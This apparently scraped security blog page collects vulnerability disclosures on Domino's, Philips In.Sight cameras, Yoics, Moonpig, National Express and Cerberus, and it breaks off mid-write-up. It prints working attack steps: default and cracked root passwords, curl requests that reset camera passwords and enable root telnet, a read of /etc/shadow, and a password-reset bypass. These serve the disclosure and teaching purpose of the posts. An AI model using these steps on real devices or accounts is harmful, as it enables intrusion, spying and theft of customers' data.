My second thought: <strong>shit</strong>.</p> <p>The pizza arrives and I tell the delivery driver there must have been a mistake with the order as I never entered any card details and wanted to pay with cash. He happily leaves with £26 and my conscience is clean.</p> <p>Let's take a look at what happened. Essentially the App's logic boils down to <em>(pseudocode)</em>:</p> <pre><code>if (datacash.response.reason == 'ACCEPTED' &amp;&amp; datacash.response.status == 1) placeOrder(); </code></pre> <p>Where <code>placeOrder()</code> sends an HTTP request to the Domino's API with the <code>order_id</code> (generated when you start your order) and <code>&lt;merchantreference&gt;</code> (in the above XML response). All Domino's needed to do was verify the reference server side. But no, let's trust the client. The client <em>never</em> lies.</p> <p>Payments aside, the moral of the story is to always validate your inputs server side. <strong>Always</strong>.</p><p class="notification is-link"><strong>Sidenote</strong>: I've had a few questions as to why anyone would process payments client side. Seems ridiculous, right? There are genuine reasons to do so, mainly that it drastically reduces risk and removes your responsibility for handling credit card data, i.e. you don't have to go through PCI DSS compliance, thus reducing your implementation costs.</p>
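The missing control is conceptually tiny: treat the gateway, not the client, as the source of truth. A minimal sketch in Python (illustrative names only, not Domino's or DataCash's actual API; <code>txn</code> stands for a transaction record fetched server-to-server from the gateway):

```python
def place_order(order_id, txn):
    """Accept an order only if the gateway-confirmed transaction is authorised.

    `txn` must come from a server-to-server lookup against the payment
    gateway using the merchant reference - never from the client's copy
    of the gateway response, which the client can tamper with.
    """
    if txn.get("reason") != "ACCEPTED" or txn.get("status") != 1:
        return False  # reject: the gateway never authorised this payment
    return True       # safe to start preparing the order
```

With this check in place, flipping `<reason>` to ACCEPTED in an intercepting proxy achieves nothing, because the server re-queries the gateway's own record.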
    Paul Price paul@darkport.co.uk
  • 30 Jan '15 Owning Philips In.Sight IP Cameras
    Poppin' root shells on Internet-enabled cameras.
  • Owning Philips In.Sight IP Cameras 2015-01-30

    This is a continuation from my previous post but this time we'll be taking a look at the device itself, the Philips In.Sight M100. The end goal is to pop a root shell on the device which we successfully accomplish by exploiting multiple vulnerabilities.

    <p>This is a continuation from my <a href="http://www.ifc0nfig.com/yoics-account-takeover-vulnerability">previous post</a> but this time we'll be taking a look at the device itself, the <a href="http://www.philips.co.uk/c-p/M100_05/wireless-home-monitor">Philips In.Sight M100</a>. The end goal is to pop a root shell on the device which we successfully accomplish by exploiting multiple vulnerabilities.</p> <h3 id="abitofrr">A bit of R&amp;R</h3> <p>Let's start with the basics. After a little bit of Google-fu we find the camera is based on the Maxim MG3500 board. The <a href="http://www.mds.com/system/resources/BAhbBlsHOgZmIj0yMDExLzAzLzA4LzA5LzIzLzU2LzQxNy9tZzM1MDBfZXZwMl9kYXRhX3NoZWV0X3JldjJiLnBkZg/">data sheet</a> reveals it has an ARM9 processor and runs Linux. From a software perspective it mentions an embedded web server, RTP streaming, a kernel based on 2.6.20, BusyBox and built-in Lua. There's even talk of a toolchain which may come in handy later on.</p> <p>To get the camera connected to the network you have to use the setup wizard in the <a href="https://play.google.com/store/apps/details?id=com.philips.cl.insight">Android</a> or <a href="https://itunes.apple.com/gb/app/philips-in.sight-m100-b120/id506640760">iOS</a> app. You are asked for your WiFi password which is then encoded into a QR code for your camera to read so it can connect:</p> <pre><code class="language-bash">WIFI:T:WPAPSK2_AES;S:SSID;P:KEY;;12:1:;IP:;PID:2000;TZ:GMT+0:00##+ </code></pre> <p>After a few seconds the camera flashes green to notify you it's connected. We confirm this from my router's ARP table:</p> <pre><code> 00:00:48:02:2A:E3:6C </code></pre> <p>and a ping. I suspect port 80 and RTP ports will be open, let's check with an nmap scan:</p> <pre><code class="language-bash">root@debian: # nmap -v -O -sV -A -T4 [...] 
23/tcp   open  telnet      syn-ack  Busybox telnetd
80/tcp   open  http        syn-ack  lighttpd 1.4.24
88/tcp   open  tcpwrapped  syn-ack
554/tcp  open  sip         syn-ack  RtpRtspServer (Status: 200 OK)
1935/tcp open  rtmp?       syn-ack
8080/tcp open  http-proxy? syn-ack
</code></pre> <p>Telnet seems like a good place to start. After a few login attempts using common root passwords I notice there is a ~5 second delay between each attempt so unfortunately it looks like an online brute force attack is out of the question.</p> <p>The web interface doesn't give much away either and requires authentication. We know the Android app talks to the camera directly, presumably through the web interface or some sort of API, so let's run it through apktool and take a look at the Java code.</p> <h3 id="theandroidapp">The Android App</h3> <p>In the class <code>HttpCommon</code> we find these static variables:</p> <pre><code class="language-java">public static final String CAMERA_USERNAME = "admin";
public static final String CAM_DEFAULT_PASSWD = "M100-4674448";
</code></pre> <p>Really?</p> <p><img src="/assets/img/phillips_1.png" alt=""></p> <p>Really. Okay, so we don't get much and trying regular directories (/admin, /cgi-bin) doesn't give us anything. Fortunately our friend <code>HttpCommon</code> gives us a list of all available resources. A few in particular caught my eye:</p> <pre><code class="language-java">public static final String HTTP_RES_ROOT_PATH = "/cgi-bin/v1";
public static final String HTTP_RES_CAMERA = "/camera";
public static final String HTTP_RES_FW_AUTOUPGRADE = "/firmware/autoupgrade";
public static final String HTTP_RES_FW_VERSION = "/firmware/version";
public static final String HTTP_RES_JPEG_BIG = "/cgi-bin/img-0.cgi";
public static final String HTTP_RES_RTSP_SES_BIG = "/stream0";
public static final String HTTP_RES_SET_CAM_PASSWD = "/users/admin";
</code></pre> <p>The last one got me excited. But let's start from the top.</p> <p><code>GET /camera</code> returned a 404. Hmm. 
<code>GET /cgi-bin/img-0.cgi</code> worked and spits out a picture from the camera. Everything else 404'd. The first variable stood out: <code>HTTP_RES_ROOT_PATH</code>. Maybe... <code>GET /cgi-bin/v1/camera</code> - bingo! <code>GET /stream0</code> shows me a live video stream, very handy for snooping.</p> <p>From the Java code we can see that <code>/users/admin</code> is a <code>POST</code> request with an XML body, here's a typical request:</p> <pre><code class="language-bash">curl -H 'Authorization: b64(admin:M100-4674448)' -H 'Content-Type: application/xml' -X 'POST' --data '&lt;users&gt;&lt;admin&gt;&lt;password s="newpassword" /&gt;&lt;/admin&gt;&lt;/users&gt;' '' </code></pre> <p><strong>And the password has been changed.</strong> This didn't work for <code>root</code> and you can't log in with these credentials via telnet, so I assume it has its own internal database.</p> <p>At least now I can view the camera stream, listen to live audio and even view Dropbox OAuth keys, Twitter username/password and YouTube username/password if the user has set them.</p> <p>It's at this point I decided to update the firmware as there's no point in finding a root exploit if it's already been patched. Unfortunately this disabled telnet :-(. I then registered the camera with Yoics which disabled the <em>default</em> password. Let's see what's going on.</p> <p>When you first register the device with Yoics it changes the admin password via the <code>POST /users/admin</code> HTTP request. Lucky for us the password is generated client side in the Android app via this function:</p> <pre><code class="language-java">public static String generateCamPassword(String paramString) {
  String str = generateMd5Hash(paramString).substring(0, 10);
  return "i" + str;
}
</code></pre> <p>This calculates the MD5 of <code>paramString</code>, which is the camera's MAC address, takes the first 10 characters and prepends <code>i</code>. 
So given our MAC of <code>00:00:48:02:2A:E3:6C</code> we can generate a password of <code>i2a5f126c7e</code>. <strong>And we're back in.</strong></p> <p>Now I'm pretty sure that if we sit and blind inject various CGI scripts we could escalate our privileges, but ain't nobody got time for that. Let's go deeper.</p> <h3 id="thefirmware">The Firmware</h3> <p>We now know the camera can download and update its own firmware so let's extract it ourselves and find out what lies within.</p> <h6 id="obtaining">Obtaining</h6> <p>When you first open up the Philips Android app it makes a request to <code>http://philips.yoics.net/M100/philips_insight_m100_revisions.xml</code> and saves the response locally. The file contains a list of firmware revisions and this is the latest:</p> <pre><code class="language-xml">&lt;revision&gt;
  &lt;RevisionSequence&gt;7.3&lt;/RevisionSequence&gt;
  &lt;RevisionVersion&gt;47283&lt;/RevisionVersion&gt;
  &lt;ReleaseDate&gt;12Nov2014_1807&lt;/ReleaseDate&gt;
  &lt;ReleaseLabel&gt;7.3&lt;/ReleaseLabel&gt;
  &lt;iOSState&gt;active&lt;/iOSState&gt;
  &lt;iOSMinCompatability&gt;1.8&lt;/iOSMinCompatability&gt;
  &lt;AndroidState&gt;active&lt;/AndroidState&gt;
  &lt;AndroidMinCompatability&gt;1.2.5&lt;/AndroidMinCompatability&gt;
  &lt;DownloadURL&gt;http://philips.yoics.net/M100/RC7.3&lt;/DownloadURL&gt;
  &lt;ReleaseNotes&gt;Dropbox TLS SSL Support&lt;/ReleaseNotes&gt;
  &lt;ReleaseNotesURL&gt;http://philips.yoics.com/M100/RC7.3/release_notes.txt&lt;/ReleaseNotesURL&gt;
  &lt;UpgradeMode&gt;0&lt;/UpgradeMode&gt;
  &lt;Priority&gt;Critical&lt;/Priority&gt;
  &lt;UserFilter /&gt;
  &lt;ReminderDays&gt;1&lt;/ReminderDays&gt;
  &lt;FullUpgradeRequired&gt;5.4,5.5&lt;/FullUpgradeRequired&gt;
&lt;/revision&gt;
</code></pre> <p>The <code>DownloadURL</code> returns a 403 so I suspect we need to append a filename as well, let's confirm this. 
When you click the "update firmware" button in the Android app it sends the request <code>POST /firmware/autoupgrade</code> to the camera with the XML body:</p> <pre><code class="language-xml">&lt;firmware&gt;
  &lt;autoupgrade&gt;
    &lt;path s="DOWNLOAD_URL_FROM_ABOVE" /&gt;
    &lt;type ul="M100" /&gt;
  &lt;/autoupgrade&gt;
&lt;/firmware&gt;
</code></pre> <p>Presumably the camera has the file names hard-coded and appends them to the download URL. The easiest way to find the filename is to replay the above request but change the path to an HTTP server we control so we can see what is being requested.</p> <p><em>I later learned that there is no signature checking of any kind for the firmware so it's pretty much game over from here. You could write your own firmware (using the Toolchain above) and get the camera to install it.</em></p> <p>We then see three files requested within the logs:</p> <pre><code> </code></pre> <h6 id="extracting">Extracting</h6> <p>Let's start with <code>Philips-InSight-snor-rootfs.img</code> where the actual URL is <code>http://philips.yoics.net/M100/RC7.3/Philips-InSight-snor-rootfs.img</code>:</p> <pre><code class="language-bash">root@debian: # file Philips-InSight-snor-rootfs.img
Philips-InSight-snor-rootfs.img: Squashfs filesystem, little endian, version 4.0, 6548147 bytes, 948 inodes, blocksize: 131072 bytes, created: Thu Nov 13 02:18:09 2014
root@debian: # unsquashfs Philips-InSight-snor-rootfs.img
[===================================================================\] 847/847 100%
</code></pre> <p>Well that was easy. I was at least expecting it to be LZMA compressed with offsets changed or some sort of XOR encryption. 
No fun!</p> <h3 id="poppingshells">Popping Shells</h3> <p>First things first:</p> <pre><code class="language-bash">root@debian: # cat ./squashfs-root/etc/shadow
root:acotQ3OjTXpo.:12773:0:99999:7:::
admin:CTedwasnlmwJM:12773:0:99999:7:::
mg3500:aa6nn6TYobAEw:12773:0:99999:7:::
</code></pre> <p>We'll let <a href="http://www.openwall.com/john/">John</a> have a pop at them, you never kn... oh, straight away it found the <code>mg3500</code> user with a password of <code>merlin</code>. Since telnet was now disabled we can't do much with it. Let's try our luck: </p> <pre><code class="language-bash">root@debian: # fgrep -Rli "telnetd" ./squashfs-root/*
var/www/cgi-bin/cam_service_enable.cgi
root@debian: # cat ./squashfs-root/var/www/cgi-bin/cam_service_enable.cgi
echo "telnet stream tcp nowait root /usr/sbin/telnetd /usr/sbin/telnetd" &gt; /tmp/inetd.conf
</code></pre> <p>Very lucky indeed. The script adds telnet (<strong>running as root</strong>) to the list of startup services. Let's call the script using the credentials we generated earlier, and try telnet again:</p> <pre><code class="language-bash">root@debian: # curl -H 'Authorization: b64(admin:i2a5f126c7e)' ''
root@debian: # telnet
Login: mg3500
Password: merlin
mg3500@m100: $
</code></pre> <p>And we're in. As expected from an embedded device everything is read-only and held in RAM, unless you write to the NVRAM. Permissions are totally locked down and no files are writeable by our user. If we run <code>ps</code> to get a list of processes I notice that the HTTP server (lighttpd 1.4.24) is running as root, oh dear.</p> <p>Looking at the httpd configs and physical file paths I come across an admin page (/7445477) which allows you to view/set every option imaginable:</p> <p><img src="/assets/img/phillips_2.png" alt=""></p> <p><strong>Hold up</strong>... 
John has found the root password: <code>insightr</code>.</p> <pre><code class="language-bash">root@debian: # telnet
Login: root
Password: insightr
mg3500@m100: #
</code></pre> <p>That's cheating, right? Maybe. From here you can completely compromise the device by changing settings, writing custom scripts to extract camera images on a regular basis, etc.</p> <p>There is an exploit in a few of the CGI scripts where you can pass in arbitrary commands and because the webserver is running as root you have free rein. I will, however, leave that for part 2 ;-).</p> <div></div>
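As an aside, the client-side password derivation shown earlier is trivial for anyone on the network to reproduce. A sketch in Python (the exact MAC string format the app feeds into the hash - case, separators - is an assumption here):

```python
import hashlib

def generate_cam_password(mac: str) -> str:
    """Port of the app's generateCamPassword: 'i' followed by the first
    10 hex characters of MD5(mac). The MAC string format (colons, case)
    the app actually hashes is an assumption in this sketch."""
    digest = hashlib.md5(mac.encode()).hexdigest()
    return "i" + digest[:10]
```

Since the MAC address is broadcast on the local network (and printed on the device), this is no better than a hard-coded default password.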
  • 29 Jan '15 Yoics: account takeover vulnerability
    Full account takeover in an IoT cloud provider used by numerous manufacturers such as Cisco and Philips.
  • Yoics: account takeover vulnerability 2015-01-29

    Yoics market themselves as "secure cloud networking" and offer a service that allows you to "Internet access (almost) anything". Many top brands use Yoics in their devices: Cisco, Astak, Philips and more. A good example is the Philips In.Sight M100 Wireless Home Monitor.

    <p><em><a href="http://www.yoics.net">Yoics</a> market themselves as "secure cloud networking" and offer a service that allows you to "Internet access (almost) anything". Many top brands use Yoics in their devices: Cisco, Astak, Philips and more. A good example is the <a href="http://www.philips.co.uk/c-p/M100_05/wireless-home-monitor">Philips In.Sight M100 Wireless Home Monitor</a>.</em></p> <p>It was possible for an attacker to manipulate the API call used for password resets and reset the password of any account, providing they know the user's e-mail address.</p> <p>Let's take a look at the raw HTTP requests.</p> <p>To begin the password reset process we first get the security question that we need to answer: </p> <pre><code class="language-http">GET /web/api/user.ashx?key=PhilipsAndroid&amp;email=6140622e636f6d&amp;action=getsecurityquestion&amp;type=xml </code></pre> <p>The <code>email</code> field is just the e-mail address hex encoded. The call simply returns the security question: <code>&lt;passwordquestion&gt;Favorite Pet's Name&lt;/passwordquestion&gt;</code></p> <p>To complete the password reset process we send another HTTP request with the answer:</p> <pre><code class="language-http">GET /web/api/user.ashx?key=PhilipsAndroid&amp;email=6140622e636f6d&amp;answer=626f62&amp;skipemail=no&amp;action=recoverpassword&amp;type=xml HTTP/1.1 </code></pre> <p>Again, the <code>answer</code> parameter is just hex encoded. If the answer is wrong we get back a simple error message. All is good.</p> <p>After trying various different combinations I noticed that if you omit the <code>answer</code> parameter entirely you get a <code>&lt;status&gt;ok&lt;/status&gt;</code> message. <strong>Has it been reset?</strong> A few minutes later I received the standard password reset e-mail. 
<em>Hmm, I wonder...</em> Let's try setting the <code>skipemail</code> parameter to yes:</p> <pre><code class="language-http">GET /web/api/user.ashx?key=PhilipsAndroid&amp;email=6140622e636f6d&amp;skipemail=yes&amp;action=recoverpassword&amp;type=xml HTTP/1.1 </code></pre> <p>And the response:</p> <pre><code class="language-xml">&lt;status&gt;ok&lt;/status&gt;
&lt;password&gt;0d8jerg&lt;/password&gt;
</code></pre> <p>Wham, bam, thank you ma'am. From here an attacker can login with the given password and access the user's IoT devices remotely.</p> <h2 id="responsibledisclosure">Responsible Disclosure</h2> <ul> <li><strong>27/01/2015</strong> - Initial contact made with vendor.</li> <li><strong>29/01/2015</strong> - Vendor confirmed the bug and will fix as a priority (within 24 hours).</li> <li><strong>30/01/2015</strong> - Patch is live in production. Confirmed fixed.</li> </ul>
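For completeness, the <code>email</code> and <code>answer</code> parameters in the requests above are nothing more exotic than hex-encoded ASCII:

```python
def encode_param(value: str) -> str:
    """Hex-encode a parameter the way the Yoics API expects."""
    return value.encode("ascii").hex()

def decode_param(hexed: str) -> str:
    """Decode a hex-encoded Yoics parameter back to text."""
    return bytes.fromhex(hexed).decode("ascii")

# The dummy values in the requests above decode straightforwardly:
# decode_param("6140622e636f6d") -> "a@b.com"
# decode_param("626f62")         -> "bob"
```

So the only "protection" on these parameters is an encoding any observer can reverse in one line.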
  • 5 Jan '15 Moonpig Vulnerability
    Unauthenticated API endpoints exposed personal and financial details of 3 million customers.
  • Moonpig Vulnerability 2015-01-05

    Moonpig are one of the most well known companies that sell personalised greeting cards in the UK. In 2007 they had a 90% market share and shipped nearly 6 million cards. In July 2011 they were bought by PhotoBox.

    <p><em>Moonpig are one of the most well known companies that sell personalised greeting cards in the UK. In 2007 they had a 90% market share and shipped nearly 6 million cards. In July 2011 they were bought by PhotoBox.</em></p> <div style="padding:20px;background-color:#fafafa;text-align:center;margin-bottom:25px;"> <h3 style="margin:0;font-size:20px;">Moonpig have since taken their API offline and Tweeted:</h3> <div style="margin:0 auto;text-align:center;width:500px;"> <blockquote class="twitter-tweet" lang="en-gb"><p>We are aware of claims re customer data and can confirm that all password and payment information is and has always been safe.</p>— Moonpig (@MoonpigUK) <a href="https://twitter.com/MoonpigUK/status/552419988834111489">January 6, 2015</a></blockquote> <script async="" src="//platform.twitter.com/widgets.js" charset="utf-8"></script> </div> <p></p></div><p></p> <p>I've seen some half-arsed security measures in my time but this just takes the biscuit. Whoever architected this system needs to be <del>shot</del> waterboarded.</p> <p>Let's dive straight in and take a look at one of their HTTP requests from the Android app to the Moonpig API.</p> <pre><code class="language-http">GET /rest/MoonpigRestWebservice.svc/addresses?&amp;customerId=5379382&amp;countryCode=9424 HTTP/1.1
Authorization: Basic aXBjiS5lOk1vb25QHjimvF58DEw
Host: api.moonpig.com
Connection: Keep-Alive
</code></pre> <p>Okay, so we're using basic authentication. It's not ideal to send our username and password in each request (as opposed to a session key) but at least it's over HTTPS - it could be worse.</p> <p>Oh, it is worse. Decoding the auth header we get <code>*redacted*:*redacted*</code>, that's not my username or password - these are static credentials sent with every request. The only identifiable piece of information left is the URL parameter <code>customerId</code>. 
I created another account, added an address, changed the URL to my new <code>customerId</code> and lo and behold it spits out my saved addresses for the other account:</p> <pre><code class="language-http">GET https://api.moonpig.com/rest/MoonpigRestWebservice.svc/addresses?&amp;customerId=713443990&amp;countryCode=9424 </code></pre> <pre><code class="language-javascript">[
  {
    "Address": "xxxxxx\r\nxxxxxxx\r\nxxxxxxx",
    "AddressBookId": 414628930,
    "AddressType": "CustomerAddress",
    "AddressTypeId": 1,
    "Anniversary": null,
    "Birthday": null,
    "BuildingName": null,
    "BuildingNumber": null,
    "Company": "Test",
    "Country": "United Kingdom",
    "County": "London",
    "Custom1": null,
    "Custom2": null,
    "Custom3": null,
    "Custom4": null,
    "Custom5": null,
    "CustomerId": 0,
    "Deleted": false,
    "DeliveryInstructions": null,
    "EmailAddress": null,
    "FacebookId": null,
    "FilterChar": null,
    "Firstname": "Test",
    "Greeting": null,
    "LastUpdated": "\/Date(147136045396670+0100)\/",
    "Lastname": "Test",
    "MainAddressBookId": null,
    "OtherDate": null,
    "Postcode": " LN1 3FN",
    "PostcodeSystemUpdated": null,
    "SortByLastName": false,
    "Suffix": null,
    "TelephoneNo": null,
    "Title": "",
    "TitleId": null,
    "Town": "London"
  }
]
</code></pre> <p>Every API request is like this, <strong>there's no authentication at all</strong> and you can pass in any customer ID to impersonate them. An attacker could easily place orders on other customers' accounts, add/retrieve card information, view saved addresses, view orders and much more.</p> <p>At this point one would usually decompile the APK and see if there are any hidden API methods but on this occasion there's no need, Moonpig have made it easy for us. If you hit the API endpoint with an unknown method you'll get a custom 404 with a link to a help page listing every method available in their API with helpful descriptions. 
The help page also exposes their internal network DNS setup - but that's another story.</p> <p>From the help file it does seem that the API supports OAuth 2.0 authorization which would fix this vulnerability... if it was implemented in the Android client.</p> <p>One particular method caught my attention: <code>GetCreditCardDetails</code>. Surely not? I hit the method with my test customer ID and this is returned:</p> <pre><code class="language-markup">&lt;ArrayOfCustomerCreditCard xmlns="http://schemas.datacontract.org/2004/07/Moonpig.Model.CustomerAttributes.Accounting" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"&gt;
  &lt;CustomerCreditCard&gt;
    &lt;CardType&gt;Credit Card (Unspeci&lt;/CardType&gt;
    &lt;CustomerId&gt;11466749&lt;/CustomerId&gt;
    &lt;ExpiryDate&gt;12/18&lt;/ExpiryDate&gt;
    &lt;LastFourDigits&gt;5993&lt;/LastFourDigits&gt;
    &lt;NameOnCard&gt;Mr X XXX&lt;/NameOnCard&gt;
    &lt;TransactionId&gt;5983632541-1&lt;/TransactionId&gt;
  &lt;/CustomerCreditCard&gt;
&lt;/ArrayOfCustomerCreditCard&gt;
</code></pre> <p>Hey, at least they're not returning the full card number!</p> <p>I hit my test user's details a few hundred times in quick succession and was not rate limited. Given that customer IDs are sequential an attacker would find it very easy to build up a database of Moonpig customers along with their addresses and card details in a few hours - very scary indeed.</p> <h3 id="responsibledisclosure">Responsible Disclosure</h3> <ul> <li><em>18th Aug '13</em> - (<strong>yes, 2013!</strong>) Initial contact made with vendor. After a few e-mails back and forth their reasoning was legacy code and they'll "get right on it".</li> <li><em>26th Sep '14</em> - Follow up e-mail. Issue still not resolved. 
ETA "before Christmas"</li> <li><em>5th Jan '15</em> - Vulnerability still exists with an ample amount of time given to the vendor to fix the issue.</li> </ul> <p>Initially I was going to wait until they fixed their live endpoints but given the timeframes I've decided to publish this post to force Moonpig to fix the issue and protect the privacy of their customers (who knows who else knows about this!). ~17 months is more than enough time to fix an issue like this. It appears customer privacy is not a priority to Moonpig.</p>
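The fix is equally unexciting: every handler must derive the customer ID from an authenticated session rather than trusting a URL parameter. A hedged sketch (illustrative Python, not Moonpig's actual code or API):

```python
def get_addresses(session, requested_customer_id):
    """Sketch of the per-request check Moonpig's API was missing: the
    customer ID used for the lookup comes from the authenticated
    session, and a mismatching client-supplied ID is rejected."""
    if session is None or not session.get("authenticated"):
        raise PermissionError("no authenticated session")
    if requested_customer_id != session["customer_id"]:
        raise PermissionError("customer ID does not match session")
    # Stub standing in for the actual address-book lookup.
    return {"customer_id": session["customer_id"], "addresses": []}
```

With this in place, swapping `customerId=5379382` for someone else's ID returns an error instead of their address book.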
  • 25 Sep '14 National Express print-at-home vulnerability
    Information disclosure vulnerability for the UK's largest scheduled coach operator.
  • National Express print-at-home vulnerability 2014-09-25

    This is a fine example of developers being lazy and how not to implement "security".

    <p><em>This is a fine example of developers being lazy and how <strong>not</strong> to implement "security".</em></p> <p>National Express are one of the biggest public transport companies in the UK with a huge fleet of coaches and trains.</p> <div style="padding:20px;margin-bottom:30px;background-color:#f0f0f0;text-align:center;"> <h3 style="margin-bottom:20px;">This has been patched.</h3> <div style="margin:0 auto;text-align:center;width:100%;margin-left:80px;"> <blockquote class="twitter-tweet" data-conversation="none" lang="en"><p><a href="https://twitter.com/RiskObscurity">@RiskObscurity</a> <a href="https://twitter.com/NX_MD">@NX_MD</a> We had confirmation at 16:30 yesterday that this had been patched, so it will no longer work. ^dl</p>— NX Customer Service (@nxcare) <a href="https://twitter.com/nxcare/status/515761387269013504">September 27, 2014</a></blockquote> <script async="" src="//platform.twitter.com/widgets.js" charset="utf-8"></script> </div> <p style="margin:0;">Another one of their @ replies suggests they did reply to my e-mails within 24 hours, but nothing was received.</p> <p></p></div><p></p> <p>This vulnerability discloses customers' information to a potential attacker, such as the passengers' names, destination, the last 4 digits of the card, the price the customer paid for the tickets and of course the ticket itself.</p> <p>An attacker could potentially disrupt customers' journeys by amending or even cancelling bookings using the online <a href="http://coach.nationalexpress.com/nxbooking/manageMyBooking">Manage Booking</a> service, which is accessed by entering a ticket number and the last 4 digits of the card. 
If one were to be malicious, one could write a program that constantly checks for new tickets and then automatically changes the destination, for example.</p> <p>It may also be possible to plot customers who are currently on a National Express coach on a map by integrating with the <a href="http://coachtracker.nationalexpress.com/">Live Coach Tracker</a>.</p> <h3 id="theissue">The Issue</h3> <p>After you purchase an e-ticket (print-at-home) you are sent to the "print ticket" page:</p> <p><img src="/content/images/2014/Sep/neticket-1.png" alt=""></p> <p>Let's break down the URL: <code>http://coach.nationalexpress.com/nxbooking/print-ticket?ticketnumber=XXXXXXXX&amp;printKey=999388f7bd7d07ae</code></p> <p>The <code>ticketnumber</code> seems to be a sequential 8-character-long alphanumeric. The first 6 characters are A-Z and the last two are 0-9 - a few examples:</p> <pre><code>FFCBCH73
FFCYMG19
FFCYCG44
</code></pre> <p>Now for the <code>printKey</code>. Just by looking at the value it looks like half an MD5 hash. The first thing I tried was to MD5 the ticket number which gives: <code>1c6e488449e3741a<strong>999388f7bd7d07ae</strong></code>. Errr what... could it be?! <strong>Yep</strong>, the last 16 characters are our <code>printKey</code> - fantastic security.</p> <p>One could write a simple program that generates a bunch of ticket numbers and print keys, hits the endpoint and parses out the HTML. As there is no rate limiting an attacker could easily pull out 1000s of tickets within minutes.</p> <p>There is no excuse here, it's pure laziness. Ideally you would generate a random string (e.g. a UUID) and store this along with the ticket number but that requires database schema changes and may not be easy/quick to implement depending on their infrastructure. A simple "quick fix" solution would be to use HMAC-SHA256 to hash the ticket number with a private key. 
Any old URLs with an MD5 print key can be redirected to the "Manage Booking" page so the user has to explicitly authenticate themselves.</p> <h3 id="responsibledisclosure">Responsible Disclosure</h3> <p>I attempted to contact National Express via their website on three occasions over three months with no response. Hopefully this blog post grabs their attention and forces them to patch the vulnerability and protect their customers.</p> <ul> <li><em>Jul '14</em> - Attempted initial contact with vendor - no response.</li> <li><em>Aug '14</em> - 2nd attempt to contact vendor - no response.</li> <li><em>13th Sep '14</em> - Final attempt to contact vendor - no response.</li> <li><em>25th Sep '14</em> - Full disclosure.</li> </ul>
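Both the broken scheme and the suggested quick fix fit in a few lines. A sketch in Python (the HMAC output truncation length is an illustrative choice, not something National Express specified):

```python
import hashlib
import hmac

def weak_print_key(ticket_number: str) -> str:
    """The scheme National Express used: the printKey is just the last
    16 hex characters of MD5(ticket number), so anyone who can guess a
    ticket number can derive its printKey."""
    return hashlib.md5(ticket_number.encode()).hexdigest()[16:]

def hmac_print_key(ticket_number: str, secret: bytes) -> str:
    """The suggested quick fix: HMAC-SHA256 over the ticket number with
    a server-side secret key, so the printKey cannot be derived from
    the ticket number alone. Truncation to 16 chars is illustrative."""
    return hmac.new(secret, ticket_number.encode(), hashlib.sha256).hexdigest()[:16]
```

The HMAC variant needs no schema change: the server recomputes the key on each request and compares, and without the secret an attacker cannot forge valid URLs.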
  • 19 Dec '13 Cerberus anti-theft – an exploit allowing you to access any device
    Exploiting an anti-theft app to compromise thousands of devices worldwide.
  • Cerberus anti-theft – an exploit allowing you to access any device 2013-12-19

    You may or may not have heard of Cerberus, an anti-theft application for Android devices. Cerberus allows you to remotely control your device if it has been lost or stolen. Features include: locate and track your device, start alarms, get a list of recent calls, download SMS messages, take pictures, record video, record audio and much more – all of which is done discreetly without the “thief” knowing so you can track your phone down and attempt to recover it. Pretty cool, right? Now imagine if anyone could access your device and listen to your conversations. A security hole in Cerberus allows just that.

    <p>You may or may not have heard of <a href="https://play.google.com/store/apps/details?id=com.lsdroid.cerberus&amp;hl=en">Cerberus</a>, an anti-theft application for Android devices. Cerberus allows you to remotely control your device if it has been lost or stolen. Features include: locate and track your device, start alarms, get a list of recent calls, download SMS messages, take pictures, record video, record audio and much more – all of which is done discreetly without the “thief” knowing so you can track your phone down and attempt to recover it. Pretty cool, right? <strong>Now imagine if anyone could access your device and listen to your conversations. A security hole in Cerberus allows just that.</strong></p> <div style="padding:20px;margin-bottom:30px;background-color:#fafafa;text-align:center;"> <h3 style="margin:0;">This has been fixed, see below</h3> </div> <h3 id="cerberussecurity">Cerberus Security</h3> <p>You may think Cerberus is pretty secure. You have a username and password, which only you know, similar to Facebook and practically every other website out there with a login system. 99% of the time this is fine and an accepted standard for authenticating yourself. The problem here lies with what’s going on behind the scenes. When you login with your username and password the Cerberus API replies back with a “device ID”, a seemingly random 15-digit number; this ID is then used in subsequent requests to “authenticate” you – that’s right, your username/password aren’t used past the initial stage. Upon further investigation it turns out that this number is your device's IMEI number.</p> <h3 id="anatomyofanimeinumber">Anatomy of an IMEI number</h3> <p>Before we delve in further let’s take a quick look at the format of an IMEI number. IMEI numbers are not distributed uniformly at random. The first 8 digits of an IMEI represent the Type Allocation Code (TAC), which is determined by the model of the phone. 
For example, because I have a Samsung Galaxy Note 2, the first 8 digits of my IMEI are 35362705. Although this is the most significant portion of my IMEI number, it is not private information; knowing the model of my phone (or guessing the model) is sufficient to guess most of my IMEI number.</p> <p>After the 8-digit TAC there are 6 digits that uniquely identify the specific device. <strong>These 6 digits are the only digits that are difficult for an attacker to guess.</strong> After those 6 digits the last digit is a Luhn-checksum digit, which is computed as a function of the first 14 digits. Thus, in a 15-digit IMEI number there is a relatively low amount of randomness.</p> <p>Further Reading:</p> <ol> <li><a href="http://blog.dasient.com/2011/07/hashing-imei-numbers-does-not-protect.html">http://blog.dasient.com/2011/07/hashing-imei-numbers-does-not-protect.html</a> </li> <li><a href="http://en.wikipedia.org/wiki/International_Mobile_Station_Equipment_Identity">http://en.wikipedia.org/wiki/International_Mobile_Station_Equipment_Identity</a></li> </ol> <h3 id="theattack">The attack</h3> <p>You can easily generate 10<sup>6</sup> (1,000,000) numbers within seconds, it’s verifying them that takes time. To verify an IMEI is valid and Cerberus has that device registered on their system you have to fire off an HTTP request. On my machine I can do 14 verifications a second in a single thread. One could verify <strong>ALL</strong> IMEI numbers for a Samsung Galaxy Note 2 within 15 hours. I managed to randomly generate a bunch of IMEIs (with the Note 2 TAC) and verify my own IMEI within 2 hours - obviously a lot of luck was involved in this but you get the idea.</p> <p>When "verifying" an IMEI number the Cerberus API kindly returns back the username and SHA1 hashed password associated with that device – thanks guys! So what are we going to do? Maybe run the password hash through a rainbow table? 
